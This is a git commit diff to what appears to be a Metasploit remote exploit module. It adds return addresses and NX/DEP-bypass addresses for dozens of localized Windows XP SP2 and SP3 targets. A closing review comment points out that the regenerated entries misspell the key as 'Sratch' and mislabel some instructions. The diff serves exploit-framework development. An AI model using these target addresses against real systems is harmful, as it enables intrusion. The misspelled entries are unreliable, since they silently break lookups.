Complete international support for XP SP2 / XP SP3
git-svn-id: file:///home/svn/framework3/trunk@5846 4d416f70-5f16-0410-b530-b9f4589650da
unstable
parent
9ee7eb2e87
commit
308a90a01d
|
@ -102,8 +102,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'Windows XP SP2 English (NX)',
|
||||
{
|
||||
'Ret' => 0x6f88f727,
|
||||
'DisableNX' => 0x6F8916E2,
|
||||
'Scratch' => 0x00020408,
|
||||
'DisableNX' => 0x6f8916e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
|
@ -112,8 +112,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'Windows XP SP3 English (NX)',
|
||||
{
|
||||
'Ret' => 0x6f88f807,
|
||||
'DisableNX' => 0x6F8917C2,
|
||||
'Scratch' => 0x00020408,
|
||||
'DisableNX' => 0x6f8917c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
|
@ -166,190 +166,350 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
#
|
||||
# NON-ENGLISH TARGETS
|
||||
# NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED
|
||||
#
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Arabic (NX)',
|
||||
{
|
||||
'Ret' => 0x6fd8f727,
|
||||
'DisableNX' => 0x6fd916e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Chinese - Traditional / Taiwan (NX)',
|
||||
{
|
||||
'Ret' => 0x5860f727,
|
||||
'DisableNX' => 0x586116e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Chinese - Simplified (NX)',
|
||||
{
|
||||
'Ret' => 0x58fbf727,
|
||||
'DisableNX' => 0x58fc16e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Chinese - Traditional (NX)',
|
||||
{
|
||||
'Ret' => 0x5860f727,
|
||||
'DisableNX' => 0x586116e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Czech (NX)',
|
||||
{
|
||||
'Ret' => 0x6fe1f727,
|
||||
'DisableNX' => 0x6fe216e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Danish (NX)',
|
||||
{
|
||||
'Ret' => 0x5978f727,
|
||||
'DisableNX' => 0x597916e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 German (NX)',
|
||||
{
|
||||
'Ret' => 0x6fd9f727,
|
||||
'DisableNX' => 0x6fda16e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Greek (NX)',
|
||||
{
|
||||
'Ret' => 0x592af727,
|
||||
'DisableNX' => 0x592b16e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Spanish (NX)',
|
||||
{
|
||||
'Ret' => 0x6fdbf727,
|
||||
'DisableNX' => 0x6fdc16e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Finnish (NX)',
|
||||
{
|
||||
'Ret' => 0x597df727,
|
||||
'DisableNX' => 0x597e16e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 French (NX)',
|
||||
{
|
||||
'Ret' => 0x595bf727,
|
||||
'DisableNX' => 0x595c16e2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Hebrew (NX)',
|
||||
{
|
||||
'Ret' => 0x5940f727,
|
||||
'DisableNX' => 0x594116e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Hungarian (NX)',
|
||||
{
|
||||
'Ret' => 0x5970f727,
|
||||
'DisableNX' => 0x597116e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by Giorgio Casali <giorgio.casali[at]gmail.com>
|
||||
#
|
||||
[ 'Windows XP SP2 Italian (NX)',
|
||||
{
|
||||
'Ret' => 0x596bf727,
|
||||
'DisableNX' => 0x596c16e2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Japanese (NX)',
|
||||
{
|
||||
'Ret' => 0x567fd3be,
|
||||
'DisableNX' => 0x568016e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Korean (NX)',
|
||||
{
|
||||
'Ret' => 0x6fd6f727,
|
||||
'DisableNX' => 0x6fd716e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Dutch (NX)',
|
||||
{
|
||||
'Ret' => 0x596cf727,
|
||||
'DisableNX' => 0x596d16e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Norwegian (NX)',
|
||||
{
|
||||
'Ret' => 0x597cf727,
|
||||
'DisableNX' => 0x597d16e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Polish (NX)',
|
||||
{
|
||||
'Ret' => 0x5941f727,
|
||||
'DisableNX' => 0x594216e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by Ramon de C. Valle <ramon@risesecurity.org>
|
||||
#
|
||||
[ 'Windows XP SP2 Portuguese - Brazilian (NX)',
|
||||
{
|
||||
'Ret' => 0x596ff727,
|
||||
'DisableNX' => 0x597016e2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided think.pink[at]gmx.de
|
||||
#
|
||||
[ 'Windows XP SP2 German (NX)',
|
||||
{
|
||||
'Ret' => 0x6fda2b0f,
|
||||
'DisableNX' => 0x6fda16e2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by sunwear <shellcoder[at]hotmail.com>
|
||||
#
|
||||
[ 'Windows XP SP2 Chinese - Simplified (NX)',
|
||||
{
|
||||
'Ret' => 0x58fcda43,
|
||||
'DisableNX' => 0x58fc16e2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
#
|
||||
[ 'Windows XP SP3 French (NX)',
|
||||
{
|
||||
'Ret' => 0x595bf807,
|
||||
'DisableNX' => 0x595c17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by Ulises2k <ulises2k[at]gmail.com>
|
||||
#
|
||||
[ 'Windows XP SP3 Spanish (NX)',
|
||||
{
|
||||
'Ret' => 0x6fdbf807,
|
||||
'DisableNX' => 0x6fdc17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by Thierry Zoller <Thierry[at]zoller.lu>
|
||||
#
|
||||
[ 'Windows XP SP3 German (NX)',
|
||||
{
|
||||
'Ret' => 0x6fda2bef,
|
||||
'DisableNX' => 0x6fda17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Russian (NX)',
|
||||
[ 'Windows XP SP2 Portuguese (NX)',
|
||||
{
|
||||
'Ret' => 0x6fe1f807,
|
||||
'DisableNX' => 0x6fe217c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x596bf727,
|
||||
'DisableNX' => 0x596c16e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Russian (NX)',
|
||||
{
|
||||
'Ret' => 0x6fe1f727,
|
||||
'DisableNX' => 0x6fe216e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Swedish (NX)',
|
||||
{
|
||||
'Ret' => 0x597af727,
|
||||
'DisableNX' => 0x597b16e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Turkish (NX)',
|
||||
{
|
||||
'Ret' => 0x5a78f727,
|
||||
'DisableNX' => 0x5a7916e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Arabic (NX)',
|
||||
{
|
||||
'Ret' => 0x6fd8f807,
|
||||
'DisableNX' => 0x6fd917c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)',
|
||||
{
|
||||
'Ret' => 0x5860f807,
|
||||
'DisableNX' => 0x586117c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Chinese - Simplified (NX)',
|
||||
{
|
||||
'Ret' => 0x58fbf807,
|
||||
'DisableNX' => 0x58fc17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Chinese - Traditional (NX)',
|
||||
{
|
||||
'Ret' => 0x5860f807,
|
||||
'DisableNX' => 0x586117c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Same as Russian
|
||||
[ 'Windows XP SP3 Czech (NX)',
|
||||
{
|
||||
'Ret' => 0x6fe1f807,
|
||||
'DisableNX' => 0x6fe217c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Danish (NX)',
|
||||
{
|
||||
'Ret' => 0x5978f807,
|
||||
'DisableNX' => 0x597917c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 German (NX)',
|
||||
{
|
||||
'Ret' => 0x6fd9f807,
|
||||
'DisableNX' => 0x6fda17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Greek (NX)',
|
||||
{
|
||||
'Ret' => 0x592af807,
|
||||
'DisableNX' => 0x592b17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Turkish (NX)',
|
||||
[ 'Windows XP SP3 Spanish (NX)',
|
||||
{
|
||||
'Ret' => 0x5a78f807,
|
||||
'DisableNX' => 0x5a7917c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x6fdbf807,
|
||||
'DisableNX' => 0x6fdc17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Swedish (NX)',
|
||||
[ 'Windows XP SP3 Finnish (NX)',
|
||||
{
|
||||
'Ret' => 0x597af807,
|
||||
'DisableNX' => 0x597b17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x597df807,
|
||||
'DisableNX' => 0x597e17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Portuguese (NX)',
|
||||
[ 'Windows XP SP3 French (NX)',
|
||||
{
|
||||
'Ret' => 0x596bf807,
|
||||
'DisableNX' => 0x596c17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x595bf807,
|
||||
'DisableNX' => 0x595c17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by Ramon de C. Valle <ramon@risesecurity.org>
|
||||
[ 'Windows XP SP3 Portuguese - Brazilian (NX)',
|
||||
[ 'Windows XP SP3 Hebrew (NX)',
|
||||
{
|
||||
'Ret' => 0x596ff807,
|
||||
'DisableNX' => 0x597017c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x5940f807,
|
||||
'DisableNX' => 0x594117c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Hungarian (NX)',
|
||||
{
|
||||
'Ret' => 0x5970f807,
|
||||
'DisableNX' => 0x597117c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Same as Portuguese
|
||||
[ 'Windows XP SP3 Italian (NX)',
|
||||
{
|
||||
'Ret' => 0x596bf807,
|
||||
'DisableNX' => 0x596c17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Polish (NX)',
|
||||
{
|
||||
'Ret' => 0x5941f807,
|
||||
'DisableNX' => 0x594217c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Norwegian (NX)',
|
||||
{
|
||||
'Ret' => 0x597cf807,
|
||||
'DisableNX' => 0x597d17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Korean (NX)',
|
||||
{
|
||||
'Ret' => 0x6fd6f807,
|
||||
'DisableNX' => 0x6fd717c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
|
@ -358,91 +518,92 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
{
|
||||
'Ret' => 0x567fd4d2,
|
||||
'DisableNX' => 0x568017c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Hungarian (NX)',
|
||||
[ 'Windows XP SP3 Korean (NX)',
|
||||
{
|
||||
'Ret' => 0x5970f807,
|
||||
'DisableNX' => 0x597117c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x6fd6f807,
|
||||
'DisableNX' => 0x6fd717c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Hebrew (NX)',
|
||||
[ 'Windows XP SP3 Dutch (NX)',
|
||||
{
|
||||
'Ret' => 0x5940f807,
|
||||
'DisableNX' => 0x594117c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x596cf807,
|
||||
'DisableNX' => 0x596d17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Finnish (NX)',
|
||||
[ 'Windows XP SP3 Norwegian (NX)',
|
||||
{
|
||||
'Ret' => 0x597df807,
|
||||
'DisableNX' => 0x597e17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x597cf807,
|
||||
'DisableNX' => 0x597d17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Greek (NX)',
|
||||
[ 'Windows XP SP3 Polish (NX)',
|
||||
{
|
||||
'Ret' => 0x592af807,
|
||||
'DisableNX' => 0x592b17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x5941f807,
|
||||
'DisableNX' => 0x594217c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Danish (NX)',
|
||||
[ 'Windows XP SP3 Portuguese - Brazilian (NX)',
|
||||
{
|
||||
'Ret' => 0x5978f807,
|
||||
'DisableNX' => 0x597917c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x596ff807,
|
||||
'DisableNX' => 0x597017c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Chinese - Simplified (NX)',
|
||||
[ 'Windows XP SP3 Portuguese (NX)',
|
||||
{
|
||||
'Ret' => 0x58fbf807,
|
||||
'DisableNX' => 0x58fc17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x596bf807,
|
||||
'DisableNX' => 0x596c17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Chinese - Traditional (NX)',
|
||||
[ 'Windows XP SP3 Russian (NX)',
|
||||
{
|
||||
'Ret' => 0x5860f807,
|
||||
'DisableNX' => 0x586117c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x6fe1f807,
|
||||
'DisableNX' => 0x6fe217c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Same as Chinese Traditional
|
||||
[ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)',
|
||||
[ 'Windows XP SP3 Swedish (NX)',
|
||||
{
|
||||
'Ret' => 0x5860f807,
|
||||
'DisableNX' => 0x586117c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x597af807,
|
||||
'DisableNX' => 0x597b17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Arabic (NX)',
|
||||
[ 'Windows XP SP3 Turkish (NX)',
|
||||
{
|
||||
'Ret' => 0x6fd8f807,
|
||||
'DisableNX' => 0x6fd917c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x5a78f807,
|
||||
'DisableNX' => 0x5a7917c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
|
||||
|
||||
#
|
||||
# Missing Targets
|
||||
|
|
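Review bot: The regenerated target hashes spell their last key `'Sratch'`, while the lines they replace use `'Scratch'`; this runs from the 'Windows XP SP2 English (NX)' entry through the regenerated SP3 entries. The `+`/`-` markers are not preserved on this page, so which side is new is inferred from the print order and the "AUTOMATICALLY GENERATED" header. A Ruby hash lookup on a missing key returns nil without raising, so any code outside these hunks that reads `'Scratch'` would silently get nil for every regenerated entry; the generator template should emit `'Scratch' => 0x00020408`. The regeneration also rewrites every trailing comment to `JMP ESI`, including entries whose unchanged `Ret` value was previously annotated `PUSH ESI; RET` or `CALL ESI` (for example SP3 Hungarian, `0x5970f807`), and drops the "Target provided by …" attribution comments, so the comments no longer document where each value came from. The enclosing targets array starts and ends outside the hunks shown.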